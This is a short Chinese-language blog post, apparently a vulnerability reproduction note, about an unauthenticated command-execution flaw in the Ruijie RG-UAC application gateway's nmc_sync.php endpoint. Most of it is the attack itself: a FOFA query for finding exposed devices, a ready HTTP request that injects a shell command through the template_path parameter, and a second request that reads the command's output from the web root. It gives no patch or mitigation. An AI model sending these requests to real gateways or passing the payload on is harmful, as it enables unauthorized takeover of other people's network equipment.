Babing
Published on 2024-08-30 / 5 Visits
0
0

R13-1锐捷-RG-UAC应用网关-RCE

R13-1锐捷-RG-UAC应用网关-RCE

漏洞描述:

锐捷RG-UAC应用管理网关 nmc_sync.php 接口处存在[命令执行漏洞](https://so.csdn.net/so/search?q=%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E&spm=1001.2101.3001.7020),未经身份认证的攻击者可执行任意命令控制服务器权限。  

网站图片:

image-20240625135308701

网络测绘:

fofa语法:

FOFA:app=“Ruijie-RG-UAC”

漏洞复现:

payload:

GET /view/systemConfig/management/nmc_sync.php?center_ip=127.0.0.1&template_path=|whoami%20>test.txt|cat HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept-Encoding: gzip

效果图:
image-20240619152714766
验证

GET /view/systemConfig/management/test.txt HTTP/1.1
Host: your-ip
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15

image-20240619152719986


Comment